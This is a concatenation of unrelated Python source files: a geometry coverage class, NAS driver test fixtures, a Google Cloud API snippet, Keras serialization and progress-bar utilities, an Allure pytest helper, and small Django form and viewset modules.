        if not self._prepared_geom or self._prepared_counter > self._prepared_max:
            self._prepared_geom = shapely.prepared.prep(self.geom)
            self._prepared_counter = 0
        self._prepared_counter += 1
        return self._prepared_geom

    def _geom_in_coverage_srs(self, geom, srs):
        if isinstance(geom, shapely.geometry.base.BaseGeometry):
            if srs != self.srs:
                geom = transform_geometry(srs, self.srs, geom)
        elif len(geom) == 2:
            if srs != self.srs:
                geom = srs.transform_to(self.srs, geom)
            geom = shapely.geometry.Point(geom)
        else:
            if srs != self.srs:
                geom = srs.transform_bbox_to(self.srs, geom)
            geom = bbox_polygon(geom)
        return geom

    def transform_to(self, srs):
        if srs == self.srs:
            return self

        geom = transform_geometry(self.srs, srs, self.geom)
        return GeomCoverage(geom, srs)

    def intersects(self, bbox, srs):
        bbox = self._geom_in_coverage_srs(bbox, srs)
        with self._prep_lock:
            return self.prepared_geom.intersects(bbox)

    def intersection(self, bbox, srs):
        bbox = self._geom_in_coverage_srs(bbox, srs)
        return GeomCoverage(self.geom.intersection(bbox), self.srs)

    def contains(self, bbox, srs):
        bbox = self._geom_in_coverage_srs(bbox, srs)
        with self._prep_lock:
            return self.prepared_geom.contains(bbox)

    def __eq__(self, other):
        if not isinstance(other, GeomCoverage):
            return NotImplemented

        if self.srs != other.srs:
            return False

        if self.bbox != other.bbox:
            return False

        if not self.geom.equals(other.geom):
            return False

        return True

    def __ne__(self, other):
        if not isinstance(other, GeomCoverage):
            return NotImplemented
        return not self.__eq__(other)

    def __repr__(self):
        return '<GeomCoverage %r: %r>' % (self.extent.llbbox, self.geom)
# Copyright (c) 2019 Infortrend Technology, Inc.
# All Rights Reserved.
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.


class InfortrendNASTestData(object):

    fake_share_id = ['5a0aa06e-1c57-4996-be46-b81e360e8866',  # NFS
                     'aac4fe64-7a9c-472a-b156-9adbb50b4d29']  # CIFS

    fake_share_name = [fake_share_id[0].replace('-', ''),
                       fake_share_id[1].replace('-', '')]

    fake_channel_ip = ['172.27.112.223', '172.27.113.209']

    fake_service_status_data = ('(64175, 1234, 272, 0)\n\n'
                                '{"cliCode": '
                                '[{"Return": "0x0000", "CLI": "Successful"}], '
                                '"returnCode": [], '
                                '"data": '
                                '[{"A": '
                                '{"NFS": '
                                '{"displayName": "NFS", '
                                '"state_time": "2017-05-04 14:19:53", '
                                '"enabled": true, '
                                '"cpu_rate": "0.0", '
                                '"mem_rate": "0.0", '
                                '"state": "exited", '
                                '"type": "share"}}}]}\n\n')

    fake_folder_status_data = ('(64175, 1234, 1017, 0)\n\n'
                               '{"cliCode": '
                               '[{"Return": "0x0000", "CLI": "Successful"}], '
                               '"returnCode": [], '
                               '"data": '
                               '[{"utility": "1.00", '
                               '"used": "33886208", '
                               '"subshare": true, '
                               '"share": false, '
                               '"worm": "", '
                               '"free": "321931374592", '
                               '"fsType": "xfs", '
                               '"owner": "A", '
                               '"readOnly": false, '
                               '"modifyTime": "2017-04-27 16:16", '
                               '"directory": "/share-pool-01/LV-1", '
                               '"volumeId": "6541BAFB2E6C57B6", '
                               '"mounted": true, '
                               '"size": "321965260800"}, '
                               '{"utility": "1.00", '
                               '"used": "33779712", '
                               '"subshare": false, '
                               '"share": false, '
                               '"worm": "", '
                               '"free": "107287973888", '
                               '"fsType": "xfs", '
                               '"owner": "A", '
                               '"readOnly": false, '
                               '"modifyTime": "2017-04-27 15:45", '
                               '"directory": "/share-pool-02/LV-1", '
                               '"volumeId": "147A8FB67DA39914", '
                               '"mounted": true, '
                               '"size": "107321753600"}]}\n\n')

    fake_nfs_status_off = [{
        'A': {
            'NFS': {
                'displayName': 'NFS',
                'state_time': '2017-05-04 14:19:53',
                'enabled': False,
                'cpu_rate': '0.0',
                'mem_rate': '0.0',
                'state': 'exited',
                'type': 'share',
            }
        }
    }]

    fake_folder_status = [{
        'utility': '1.00',
        'used': '33886208',
        'subshare': True,
        'share': False,
        'worm': '',
        'free': '321931374592',
        'fsType': 'xfs',
        'owner': 'A',
        'readOnly': False,
        'modifyTime': '2017-04-27 16:16',
        'directory': '/share-pool-01/LV-1',
        'volumeId': '6541BAFB2E6C57B6',
        'mounted': True,
        'size': '321965260800'}, {
        'utility': '1.00',
        'used': '33779712',
        'subshare': False,
        'share': False,
        'worm': '',
        'free': '107287973888',
        'fsType': 'xfs',
        'owner': 'A',
        'readOnly': False,
        'modifyTime': '2017-04-27 15:45',
        'directory': '/share-pool-02/LV-1',
        'volumeId': '147A8FB67DA39914',
        'mounted': True,
        'size': '107321753600',
    }]

    def fake_get_channel_status(self, ch1_status='UP'):
        return [{
            'datalink': 'mgmt0',
            'status': 'UP',
            'typeConfig': 'DHCP',
            'IP': '172.27.112.125',
            'MAC': '00:d0:23:00:15:a6',
            'netmask': '255.255.240.0',
            'type': 'dhcp',
            'gateway': '172.27.127.254'}, {
            'datalink': 'CH0',
            'status': 'UP',
            'typeConfig': 'DHCP',
            'IP': self.fake_channel_ip[0],
            'MAC': '00:d0:23:80:15:a6',
            'netmask': '255.255.240.0',
            'type': 'dhcp',
            'gateway': '172.27.127.254'}, {
            'datalink': 'CH1',
            'status': ch1_status,
            'typeConfig': 'DHCP',
            'IP': self.fake_channel_ip[1],
            'MAC': '00:d0:23:40:15:a6',
            'netmask': '255.255.240.0',
            'type': 'dhcp',
            'gateway': '172.27.127.254'}, {
            'datalink': 'CH2',
            'status': 'DOWN',
            'typeConfig': 'DHCP',
            'IP': '',
            'MAC': '00:d0:23:c0:15:a6',
            'netmask': '',
            'type': '',
            'gateway': ''}, {
            'datalink': 'CH3',
            'status': 'DOWN',
            'typeConfig': 'DHCP',
            'IP': '',
            'MAC': '00:d0:23:20:15:a6',
            'netmask': '',
            'type': '',
            'gateway': '',
        }]

    fake_fquota_status = [{
        'quota': '21474836480',
        'used': '0',
        'name': 'test-folder',
        'type': 'subfolder',
        'id': '537178178'}, {
        'quota': '32212254720',
        'used': '0',
        'name': fake_share_name[0],
        'type': 'subfolder',
        'id': '805306752'}, {
        'quota': '53687091200',
        'used': '21474836480',
        'name': fake_share_name[1],
        'type': 'subfolder',
        'id': '69'}, {
        'quota': '94091997184',
        'used': '0',
        'type': 'subfolder',
        'id': '70',
        "name": 'test-folder-02'
    }]

    fake_fquota_status_with_no_settings = []

    def fake_get_share_status_nfs(self, status=False):
        fake_share_status_nfs = [{
            'ftp': False,
            'cifs': False,
            'oss': False,
            'sftp': False,
            'nfs': status,
            'directory': '/LV-1/share-pool-01/' + self.fake_share_name[0],
            'exist': True,
            'afp': False,
            'webdav': False
        }]
        if status:
            fake_share_status_nfs[0]['nfs_detail'] = {
                'hostList': [{
                    'uid': '65534',
                    'insecure': 'insecure',
                    'squash': 'all',
                    'access': 'ro',
                    'host': '*',
                    'gid': '65534',
                    'mode': 'async',
                    'no_subtree_check': 'no_subtree_check',
                }]
            }
        return fake_share_status_nfs

    def fake_get_share_status_cifs(self, status=False):
        fake_share_status_cifs = [{
            'ftp': False,
            'cifs': status,
            'oss': False,
            'sftp': False,
            'nfs': False,
            'directory': '/share-pool-01/LV-1/' + self.fake_share_name[1],
            'exist': True,
            'afp': False,
            'webdav': False
        }]
        if status:
            fake_share_status_cifs[0]['cifs_detail'] = {
                'available': True,
                'encrypt': False,
                'description': '',
                'sharename': 'cifs-01',
                'failover': '',
                'AIO': True,
                'priv': 'None',
                'recycle_bin': False,
                'ABE': True,
            }
        return fake_share_status_cifs

    fake_subfolder_data = [{
        'size': '6',
        'index': '34',
        'description': '',
        'encryption': '',
        'isEnd': False,
        'share': False,
        'volumeId': '6541BAFB2E6C57B6',
        'quota': '',
        'modifyTime': '2017-04-06 11:35',
        'owner': 'A',
        'path': '/share-pool-01/LV-1/UserHome',
        'subshare': True,
        'type': 'subfolder',
        'empty': False,
        'name': 'UserHome'}, {
        'size': '6',
        'index': '39',
        'description': '',
        'encryption': '',
        'isEnd': False,
        'share': False,
        'volumeId': '6541BAFB2E6C57B6',
        'quota': '21474836480',
        'modifyTime': '2017-04-27 15:44',
        'owner': 'A',
        'path': '/share-pool-01/LV-1/test-folder',
        'subshare': False,
        'type': 'subfolder',
        'empty': True,
        'name': 'test-folder'}, {
        'size': '6',
        'index': '45',
        'description': '',
        'encryption': '',
        'isEnd': False,
        'share': True,
        'volumeId': '6541BAFB2E6C57B6',
        'quota': '32212254720',
        'modifyTime': '2017-04-27 16:15',
        'owner': 'A',
        'path': '/share-pool-01/LV-1/' + fake_share_name[0],
        'subshare': False,
        'type': 'subfolder',
        'empty': True,
        'name': fake_share_name[0]}, {
        'size': '6',
        'index': '512',
        'description': '',
        'encryption': '',
        'isEnd': True,
        'share': True,
        'volumeId': '6541BAFB2E6C57B6',
        'quota': '53687091200',
        'modifyTime': '2017-04-27 16:16',
        'owner': 'A',
        'path': '/share-pool-01/LV-1/' + fake_share_name[1],
        'subshare': False,
        'type': 'subfolder',
        'empty': True,
        'name': fake_share_name[1]}, {
        'size': '6',
        'index': '777',
        'description': '',
        'encryption': '',
        'isEnd': False,
        'share': False,
        'volumeId': '6541BAFB2E6C57B6',
        'quota': '94091997184',
        'modifyTime': '2017-04-28 15:44',
        'owner': 'A',
        'path': '/share-pool-01/LV-1/test-folder-02',
        'subshare': False,
        'type': 'subfolder',
        'empty': True,
        'name': 'test-folder-02'
    }]

    fake_cifs_user_list = [{
        'Superuser': 'No',
        'Group': 'users',
        'Description': '',
        'Quota': 'none',
        'PWD Expiry Date': '2291-01-19',
        'Home Directory': '/share-pool-01/LV-1/UserHome/user01',
        'UID': '100001',
        'Type': 'Local',
        'Name': 'user01'}, {
        'Superuser': 'No',
        'Group': 'users',
        'Description': '',
        'Quota': 'none',
        'PWD Expiry Date': '2017-08-07',
        'Home Directory': '/share-pool-01/LV-1/UserHome/user02',
        'UID': '100002',
        'Type': 'Local',
        'Name': 'user02'
    }]

    fake_share_status_nfs_with_rules = [{
        'ftp': False,
        'cifs': False,
        'oss': False,
        'sftp': False,
        'nfs': True,
        'directory': '/share-pool-01/LV-1/' + fake_share_name[0],
        'exist': True,
        'nfs_detail': {
            'hostList': [{
                'uid': '65534',
                'insecure': 'insecure',
                'squash': 'all',
                'access': 'ro',
                'host': '*',
                'gid': '65534',
                'mode': 'async',
                'no_subtree_check':
                'no_subtree_check'}, {
                'uid': '65534',
                'insecure': 'insecure',
                'squash': 'all',
                'access': 'rw',
                'host': '172.27.1.1',
                'gid': '65534',
                'mode': 'async',
                'no_subtree_check': 'no_subtree_check'}, {
                'uid': '65534',
                'insecure': 'insecure',
                'squash': 'all',
                'access': 'rw',
                'host': '172.27.1.2',
                'gid': '65534',
                'mode': 'async',
                'no_subtree_check': 'no_subtree_check'}]
        },
        'afp': False,
        'webdav': False,
    }]

    fake_share_status_cifs_with_rules = [
        {
            'permission': {
                'Read': True,
                'Write': True,
                'Execute': True},
            'type': 'user',
            'id': '100001',
            'name': 'user01'
        }, {
            'permission': {
                'Read': True,
                'Write': False,
                'Execute': True},
            'type': 'user',
            'id': '100002',
            'name': 'user02'
        }, {
            'permission': {
                'Read': True,
                'Write': False,
                'Execute': True},
            'type': 'group@',
            'id': '100',
            'name': 'users'
        }, {
            'permission': {
                'Read': True,
                'Write': False,
                'Execute': True},
            'type': 'other@',
            'id': '',
            'name': ''
        }
    ]

# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for GetTagKey
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.

# To install the latest published package dependency, execute the following:
#   python3 -m pip install google-cloud-resourcemanager


# [START cloudresourcemanager_v3_generated_TagKeys_GetTagKey_async]
from google.cloud import resourcemanager_v3


async def sample_get_tag_key():
    # Create a client
    client = resourcemanager_v3.TagKeysAsyncClient()

    # Initialize request argument(s)
    request = resourcemanager_v3.GetTagKeyRequest(
        name="name_value",
    )

    # Make the request
    response = await client.get_tag_key(request=request)

    # Handle the response
    print(response)

# [END cloudresourcemanager_v3_generated_TagKeys_GetTagKey_async]

# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Python utilities required by Keras."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import binascii
import codecs
import marshal
import os
import re
import sys
import time
import types as python_types

import numpy as np
import six

from tensorflow.python.util import nest
from tensorflow.python.util import tf_decorator
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import keras_export

_GLOBAL_CUSTOM_OBJECTS = {}


@keras_export('keras.utils.CustomObjectScope')
class CustomObjectScope(object):
  """Provides a scope that changes to `_GLOBAL_CUSTOM_OBJECTS` cannot escape.

  Code within a `with` statement will be able to access custom objects
  by name. Changes to global custom objects persist
  within the enclosing `with` statement. At end of the `with` statement,
  global custom objects are reverted to state
  at beginning of the `with` statement.

  Example:

  Consider a custom object `MyObject` (e.g. a class):

  ```python
      with CustomObjectScope({'MyObject':MyObject}):
          layer = Dense(..., kernel_regularizer='MyObject')
          # save, load, etc. will recognize custom object by name
  ```
  """

  def __init__(self, *args):
    self.custom_objects = args
    self.backup = None

  def __enter__(self):
    self.backup = _GLOBAL_CUSTOM_OBJECTS.copy()
    for objects in self.custom_objects:
      _GLOBAL_CUSTOM_OBJECTS.update(objects)
    return self

  def __exit__(self, *args, **kwargs):
    _GLOBAL_CUSTOM_OBJECTS.clear()
    _GLOBAL_CUSTOM_OBJECTS.update(self.backup)


@keras_export('keras.utils.custom_object_scope')
def custom_object_scope(*args):
  """Provides a scope that changes to `_GLOBAL_CUSTOM_OBJECTS` cannot escape.

  Convenience wrapper for `CustomObjectScope`.
  Code within a `with` statement will be able to access custom objects
  by name. Changes to global custom objects persist
  within the enclosing `with` statement. At end of the `with` statement,
  global custom objects are reverted to state
  at beginning of the `with` statement.

  Example:

  Consider a custom object `MyObject`

  ```python
      with custom_object_scope({'MyObject':MyObject}):
          layer = Dense(..., kernel_regularizer='MyObject')
          # save, load, etc. will recognize custom object by name
  ```

  Arguments:
      *args: Variable length list of dictionaries of name,
          class pairs to add to custom objects.

  Returns:
      Object of type `CustomObjectScope`.
  """
  return CustomObjectScope(*args)


@keras_export('keras.utils.get_custom_objects')
def get_custom_objects():
  """Retrieves a live reference to the global dictionary of custom objects.

  Updating and clearing custom objects using `custom_object_scope`
  is preferred, but `get_custom_objects` can
  be used to directly access `_GLOBAL_CUSTOM_OBJECTS`.

  Example:

  ```python
      get_custom_objects().clear()
      get_custom_objects()['MyObject'] = MyObject
  ```

  Returns:
      Global dictionary of names to classes (`_GLOBAL_CUSTOM_OBJECTS`).
  """
  return _GLOBAL_CUSTOM_OBJECTS


def serialize_keras_class_and_config(cls_name, cls_config):
  """Returns the serialization of the class with the given config."""
  return {'class_name': cls_name, 'config': cls_config}


@keras_export('keras.utils.serialize_keras_object')
def serialize_keras_object(instance):
  _, instance = tf_decorator.unwrap(instance)
  if instance is None:
    return None
  if hasattr(instance, 'get_config'):
    return serialize_keras_class_and_config(instance.__class__.__name__,
                                            instance.get_config())
  if hasattr(instance, '__name__'):
    return instance.__name__
  raise ValueError('Cannot serialize', instance)


def class_and_config_for_serialized_keras_object(
    config,
    module_objects=None,
    custom_objects=None,
    printable_module_name='object'):
  """Returns the class name and config for a serialized keras object."""
  if (not isinstance(config, dict) or 'class_name' not in config or
      'config' not in config):
    raise ValueError('Improper config format: ' + str(config))

  class_name = config['class_name']
  if custom_objects and class_name in custom_objects:
    cls = custom_objects[class_name]
  elif class_name in _GLOBAL_CUSTOM_OBJECTS:
    cls = _GLOBAL_CUSTOM_OBJECTS[class_name]
  else:
    module_objects = module_objects or {}
    cls = module_objects.get(class_name)
    if cls is None:
      raise ValueError('Unknown ' + printable_module_name + ': ' + class_name)
  return (cls, config['config'])


@keras_export('keras.utils.deserialize_keras_object')
def deserialize_keras_object(identifier,
                             module_objects=None,
                             custom_objects=None,
                             printable_module_name='object'):
  if identifier is None:
    return None
  if isinstance(identifier, dict):
    # In this case we are dealing with a Keras config dictionary.
    config = identifier
    (cls, cls_config) = class_and_config_for_serialized_keras_object(
        config, module_objects, custom_objects, printable_module_name)

    if hasattr(cls, 'from_config'):
      arg_spec = tf_inspect.getfullargspec(cls.from_config)
      custom_objects = custom_objects or {}

      if 'custom_objects' in arg_spec.args:
        return cls.from_config(
            cls_config,
            custom_objects=dict(
                list(_GLOBAL_CUSTOM_OBJECTS.items()) +
                list(custom_objects.items())))
      with CustomObjectScope(custom_objects):
        return cls.from_config(cls_config)
    else:
      # Then `cls` may be a function returning a class.
      # in this case by convention `config` holds
      # the kwargs of the function.
      custom_objects = custom_objects or {}
      with CustomObjectScope(custom_objects):
        return cls(**cls_config)
  elif isinstance(identifier, six.string_types):
    object_name = identifier
    if custom_objects and object_name in custom_objects:
      obj = custom_objects.get(object_name)
    elif object_name in _GLOBAL_CUSTOM_OBJECTS:
      obj = _GLOBAL_CUSTOM_OBJECTS[object_name]
    else:
      obj = module_objects.get(object_name)
      if obj is None:
        raise ValueError('Unknown ' + printable_module_name + ':' + object_name)
    # Classes passed by name are instantiated with no args, functions are
    # returned as-is.
    if tf_inspect.isclass(obj):
      return obj()
    return obj
  else:
    raise ValueError('Could not interpret serialized ' + printable_module_name +
                     ': ' + identifier)


def func_dump(func):
  """Serializes a user defined function.

  Arguments:
      func: the function to serialize.

  Returns:
      A tuple `(code, defaults, closure)`.
  """
  if os.name == 'nt':
    raw_code = marshal.dumps(func.__code__).replace(b'\\', b'/')
    code = codecs.encode(raw_code, 'base64').decode('ascii')
  else:
    raw_code = marshal.dumps(func.__code__)
    code = codecs.encode(raw_code, 'base64').decode('ascii')
  defaults = func.__defaults__
  if func.__closure__:
    closure = tuple(c.cell_contents for c in func.__closure__)
  else:
    closure = None
  return code, defaults, closure


def func_load(code, defaults=None, closure=None, globs=None):
  """Deserializes a user defined function.

  Arguments:
      code: bytecode of the function.
      defaults: defaults of the function.
      closure: closure of the function.
      globs: dictionary of global objects.

  Returns:
      A function object.
  """
  if isinstance(code, (tuple, list)):  # unpack previous dump
    code, defaults, closure = code
    if isinstance(defaults, list):
      defaults = tuple(defaults)

  def ensure_value_to_cell(value):
    """Ensures that a value is converted to a python cell object.

    Arguments:
        value: Any value that needs to be casted to the cell type

    Returns:
        A value wrapped as a cell object (see function "func_load")
    """
    def dummy_fn():
      # pylint: disable=pointless-statement
      value  # just access it so it gets captured in .__closure__

    cell_value = dummy_fn.__closure__[0]
    if not isinstance(value, type(cell_value)):
      return cell_value
    return value

  if closure is not None:
    closure = tuple(ensure_value_to_cell(_) for _ in closure)
  try:
    raw_code = codecs.decode(code.encode('ascii'), 'base64')
  except (UnicodeEncodeError, binascii.Error):
    raw_code = code.encode('raw_unicode_escape')
  code = marshal.loads(raw_code)
  if globs is None:
    globs = globals()
  return python_types.FunctionType(
      code, globs, name=code.co_name, argdefs=defaults, closure=closure)


def has_arg(fn, name, accept_all=False):
  """Checks if a callable accepts a given keyword argument.

  Arguments:
      fn: Callable to inspect.
      name: Check if `fn` can be called with `name` as a keyword argument.
      accept_all: What to return if there is no parameter called `name`
                  but the function accepts a `**kwargs` argument.

  Returns:
      bool, whether `fn` accepts a `name` keyword argument.
  """
  arg_spec = tf_inspect.getfullargspec(fn)
  if accept_all and arg_spec.varkw is not None:
    return True
  return name in arg_spec.args


@keras_export('keras.utils.Progbar')
class Progbar(object):
  """Displays a progress bar.

  Arguments:
      target: Total number of steps expected, None if unknown.
      width: Progress bar width on screen.
      verbose: Verbosity mode, 0 (silent), 1 (verbose), 2 (semi-verbose)
      stateful_metrics: Iterable of string names of metrics that
          should *not* be averaged over time. Metrics in this list
          will be displayed as-is. All others will be averaged
          by the progbar before display.
      interval: Minimum visual progress update interval (in seconds).
      unit_name: Display name for step counts (usually "step" or "sample").
  """

  def __init__(self, target, width=30, verbose=1, interval=0.05,
               stateful_metrics=None, unit_name='step'):
    self.target = target
    self.width = width
    self.verbose = verbose
    self.interval = interval
    self.unit_name = unit_name
    if stateful_metrics:
      self.stateful_metrics = set(stateful_metrics)
    else:
      self.stateful_metrics = set()

    self._dynamic_display = ((hasattr(sys.stdout, 'isatty') and
                              sys.stdout.isatty()) or
                             'ipykernel' in sys.modules or
                             'posix' in sys.modules)
    self._total_width = 0
    self._seen_so_far = 0
    # We use a dict + list to avoid garbage collection
    # issues found in OrderedDict
    self._values = {}
    self._values_order = []
    self._start = time.time()
    self._last_update = 0

  def update(self, current, values=None):
    """Updates the progress bar.

    Arguments:
        current: Index of current step.
        values: List of tuples:
            `(name, value_for_last_step)`.
            If `name` is in `stateful_metrics`,
            `value_for_last_step` will be displayed as-is.
            Else, an average of the metric over time will be displayed.
    """
    values = values or []
    for k, v in values:
      if k not in self._values_order:
        self._values_order.append(k)
      if k not in self.stateful_metrics:
        if k not in self._values:
          self._values[k] = [v * (current - self._seen_so_far),
                             current - self._seen_so_far]
        else:
          self._values[k][0] += v * (current - self._seen_so_far)
          self._values[k][1] += (current - self._seen_so_far)
      else:
        # Stateful metrics output a numeric value. This representation
        # means "take an average from a single value" but keeps the
        # numeric formatting.
        self._values[k] = [v, 1]
    self._seen_so_far = current

    now = time.time()
    info = ' - %.0fs' % (now - self._start)
    if self.verbose == 1:
      if (now - self._last_update < self.interval and
          self.target is not None and current < self.target):
        return

      prev_total_width = self._total_width
      if self._dynamic_display:
        sys.stdout.write('\b' * prev_total_width)
        sys.stdout.write('\r')
      else:
        sys.stdout.write('\n')

      if self.target is not None:
        numdigits = int(np.log10(self.target)) + 1
        bar = ('%' + str(numdigits) + 'd/%d [') % (current, self.target)
        prog = float(current) / self.target
        prog_width = int(self.width * prog)
        if prog_width > 0:
          bar += ('=' * (prog_width - 1))
          if current < self.target:
            bar += '>'
          else:
            bar += '='
        bar += ('.' * (self.width - prog_width))
        bar += ']'
      else:
        bar = '%7d/Unknown' % current

      self._total_width = len(bar)
      sys.stdout.write(bar)

      if current:
        time_per_unit = (now - self._start) / current
      else:
        time_per_unit = 0
      if self.target is not None and current < self.target:
        eta = time_per_unit * (self.target - current)
        if eta > 3600:
          eta_format = '%d:%02d:%02d' % (eta // 3600,
                                         (eta % 3600) // 60,
                                         eta % 60)
        elif eta > 60:
          eta_format = '%d:%02d' % (eta // 60, eta % 60)
        else:
          eta_format = '%ds' % eta

        info = ' - ETA: %s' % eta_format
      else:
        if time_per_unit >= 1 or time_per_unit == 0:
          info += ' %.0fs/%s' % (time_per_unit, self.unit_name)
        elif time_per_unit >= 1e-3:
          info += ' %.0fms/%s' % (time_per_unit * 1e3, self.unit_name)
        else:
          info += ' %.0fus/%s' % (time_per_unit * 1e6, self.unit_name)

      for k in self._values_order:
        info += ' - %s:' % k
        if isinstance(self._values[k], list):
          avg = np.mean(self._values[k][0] / max(1, self._values[k][1]))
          if abs(avg) > 1e-3:
            info += ' %.4f' % avg
          else:
            info += ' %.4e' % avg
        else:
          info += ' %s' % self._values[k]

      self._total_width += len(info)
      if prev_total_width > self._total_width:
        info += (' ' * (prev_total_width - self._total_width))

      if self.target is not None and current >= self.target:
        info += '\n'

      sys.stdout.write(info)
      sys.stdout.flush()

    elif self.verbose == 2:
      if self.target is not None and current >= self.target:
        numdigits = int(np.log10(self.target)) + 1
        count = ('%' + str(numdigits) + 'd/%d') % (current, self.target)
        info = count + info
        for k in self._values_order:
          info += ' - %s:' % k
          avg = np.mean(self._values[k][0] / max(1, self._values[k][1]))
          if avg > 1e-3:
            info += ' %.4f' % avg
          else:
            info += ' %.4e' % avg
        info += '\n'

        sys.stdout.write(info)
        sys.stdout.flush()

    self._last_update = now

  def add(self, n, values=None):
    self.update(self._seen_so_far + n, values)


def make_batches(size, batch_size):
  """Returns a list of batch indices (tuples of indices).

  Arguments:
      size: Integer, total size of the data to slice into batches.
      batch_size: Integer, batch size.

  Returns:
      A list of tuples of array indices.
  """
  num_batches = int(np.ceil(size / float(batch_size)))
  return [(i * batch_size, min(size, (i + 1) * batch_size))
          for i in range(0, num_batches)]


def slice_arrays(arrays, start=None, stop=None):
  """Slice an array or list of arrays.

  This takes an array-like, or a list of
  array-likes, and outputs:
      - arrays[start:stop] if `arrays` is an array-like
      - [x[start:stop] for x in arrays] if `arrays` is a list

  Can also work on list/array of indices: `slice_arrays(x, indices)`

  Arguments:
      arrays: Single array or list of arrays.
      start: can be an integer index (start index)
          or a list/array of indices
      stop: integer (stop index); should be None if
          `start` was a list.

  Returns:
      A slice of the array(s).

  Raises:
      ValueError: If the value of start is a list and stop is not None.
  """
  if arrays is None:
    return [None]
  if isinstance(start, list) and stop is not None:
    raise ValueError('The stop argument has to be None if the value of start '
                     'is a list.')
  elif isinstance(arrays, list):
    if hasattr(start, '__len__'):
      # hdf5 datasets only support list objects as indices
      if hasattr(start, 'shape'):
        start = start.tolist()
      return [None if x is None else x[start] for x in arrays]
    return [
        None if x is None else
        None if not hasattr(x, '__getitem__') else x[start:stop] for x in arrays
    ]
  else:
    if hasattr(start, '__len__'):
      if hasattr(start, 'shape'):
        start = start.tolist()
      return arrays[start]
    if hasattr(start, '__getitem__'):
      return arrays[start:stop]
    return [None]


def to_list(x):
  """Normalizes a list/tensor into a list.

  If a tensor is passed, we return
  a list of size 1 containing the tensor.

  Arguments:
      x: target object to be normalized.

  Returns:
      A list.
  """
  if isinstance(x, list):
    return x
  return [x]


def object_list_uid(object_list):
  """Creates a single string from object ids."""
  object_list = nest.flatten(object_list)
  return ', '.join([str(abs(id(x))) for x in object_list])


def to_snake_case(name):
  intermediate = re.sub('(.)([A-Z][a-z0-9]+)', r'\1_\2', name)
  insecure = re.sub('([a-z])([A-Z])', r'\1_\2', intermediate).lower()
  # If the class is private the name starts with "_" which is not secure
  # for creating scopes. We prefix the name with "private" in this case.
  if insecure[0] != '_':
    return insecure
  return 'private' + insecure


def is_all_none(structure):
  iterable = nest.flatten(structure)
  # We cannot use Python's `any` because the iterable may return Tensors.
  for element in iterable:
    if element is not None:
      return False
  return True


def check_for_unexpected_keys(name, input_dict, expected_values):
  unknown = set(input_dict.keys()).difference(expected_values)
  if unknown:
    raise ValueError('Unknown entries in {} dictionary: {}. Only expected '
                     'following keys: {}'.format(name, list(unknown),
                                                 expected_values))


def validate_kwargs(kwargs, allowed_kwargs,
                    error_message='Keyword argument not understood:'):
  """Checks that all keyword arguments are in the set of allowed keys."""
  for kwarg in kwargs:
    if kwarg not in allowed_kwargs:
      raise TypeError(error_message, kwarg)

# -*- coding: utf-8 -*-
from __future__ import unicode_literals

import pytest
import allure_commons
from allure_pytest.utils import ALLURE_LABEL_PREFIX, ALLURE_LINK_PREFIX


class AllureTestHelper(object):

    def __init__(self, config):
        self.config = config

    @allure_commons.hookimpl
    def decorate_as_label(self, label_type, labels):
        allure_label_marker = '{prefix}.{label_type}'.format(prefix=ALLURE_LABEL_PREFIX, label_type=label_type)
        allure_label = getattr(pytest.mark, allure_label_marker)
        return allure_label(*labels, label_type=label_type)

    @allure_commons.hookimpl
    def decorate_as_link(self, url, link_type, name):
        allure_link_marker = '{prefix}.{link_type}'.format(prefix=ALLURE_LINK_PREFIX, link_type=link_type)
        pattern = dict(self.config.option.allure_link_pattern).get(link_type, u'{}')
        url = pattern.format(url)
        allure_link = getattr(pytest.mark, allure_link_marker)
        return allure_link(url, name=name, link_type=link_type)

#
# farmwork/forms.py
#

from django import forms
from django.utils.text import slugify
from .models import Farmwork


# ========================================================
# FARMWORK FORM
# ========================================================

class FarmworkForm(forms.ModelForm):

    def __init__(self, *args, **kwargs):
        super(FarmworkForm, self).__init__(*args, **kwargs)

    class Meta:
        model = Farmwork
        fields = [
            'job_role',
            'job_fruit',
            'job_pay',
            'job_pay_type',
            'job_start_date',
            'job_duration',
            'job_duration_type',
            'job_description',
            'con_first_name',
            'con_surname',
            'con_number',
            'con_email',
            'con_description',
            'acc_variety',
            'acc_price',
            'acc_price_type',
            'acc_description',
            'loc_street_address',
            'loc_city',
            'loc_state',
            'loc_post_code',
        ]

    # --
    # AUTO GENERATE SLUG ON SAVE
    # Credit: https://keyerror.com/blog/automatically-generating-unique-slugs-in-django
    # --

    def save(self):

        if self.instance.pk:
            return super(FarmworkForm, self).save()

        instance = super(FarmworkForm, self).save(commit=False)
        instance.slug = slugify(instance.get_job_fruit_display() + '-' + instance.get_job_role_display() + '-in-' + instance.loc_city)
        instance.save()

        return instance

from django.contrib.auth.models import AnonymousUser

from core.models import Identity

from api.v2.serializers.post import AccountSerializer
from api.v2.views.base import AdminAuthViewSet


class AccountViewSet(AdminAuthViewSet):
    """
    API endpoint that allows providers to be viewed or edited.
    """
    lookup_fields = ("id", "uuid")
    queryset = Identity.objects.all()
    serializer_class = AccountSerializer
